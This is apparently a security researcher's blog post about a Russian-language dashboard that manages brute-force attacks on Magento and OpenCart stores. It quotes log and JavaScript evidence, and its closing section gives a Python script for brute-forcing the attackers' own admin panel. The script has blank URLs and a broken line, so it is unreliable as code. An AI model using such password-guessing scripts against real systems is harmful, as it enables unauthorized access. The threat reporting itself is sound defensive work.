An OpenCart/Magento hacking dashboard

This post shows how sophisticated Magento hacking operations have become nowadays.

While investigating a bruteforced Magento store, I noticed that the hacker logged in using a curious referrer site:

"GET /rss/catalog/notifystock/ HTTP/1.1" 200 5676 ""

The site at shows:

brute force dashboard

A “Magento report panel” asks for a Пароль (password). In the page source (beautified JS here) are some clues about its password protected functionality:

$.post("/home/getServers", function(n) {
$.post("/home/GetCountGoodLastDay", function(n) {
$.post("/home/GetCountServerLastDay", function(n) {
$.post("/home/GetCountSuccessLastDay", function(n) {
$.post("/home/ChangeMarkState", {
$.post("/home/ChangeComment", { 
$.post("/home/getCount", { 
$.post("/home/ChangeShell", {
$.post("/home/ChangeReservedLogins", {

Apparently somebody has built a sophisticated dashboard to manage bruteforce Magento hacking operations. It appears to show the daily progress on hacked Magento stores and it has a GUI method to mark found servers as “success”. Also, it can be used to log in to the backend of hacked stores.

I checked my forensic notes of previous cases and found that this dashboard was used in at least one other case. Sysadmins, check your server logs.

Update April 11th: Super-sleuth Len Lorijn noted that an “Opencart Report Panel” is running on the same server. This signifies that e-commerce hackers are platform agnostic. If there’s money flowing through it, it’s worth hacking.

Returning the favour

What if the bruteforcer got bruteforced? Now, I won’t do that, as it is not allowed in my country. But in theory, you could use something like this (provided for educational purposes only):

#!/usr/bin/env python3
Brute force the admin password
of a Russian brute forcer's admin panel

import requests
URL = ''

print("Downloading Russian wordlist...")
wordlist = requests.get('').json()

for word in wordlist:
	print("Trying {}".format(word.encode('utf-8')))
	resp =, data=dict(Password=word))
	if resp.status_code == 200 and 'form action="/Account/Login"' not in resp.content:
		print("{} looks good!".format(word.encode('utf-8')))
I am the creator of MageReport and have been tracking payment skimmers since 2015. My company Sanguine Security provides security solutions for online stores. If you need a solid cleanup & root cause analysis, do get in touch.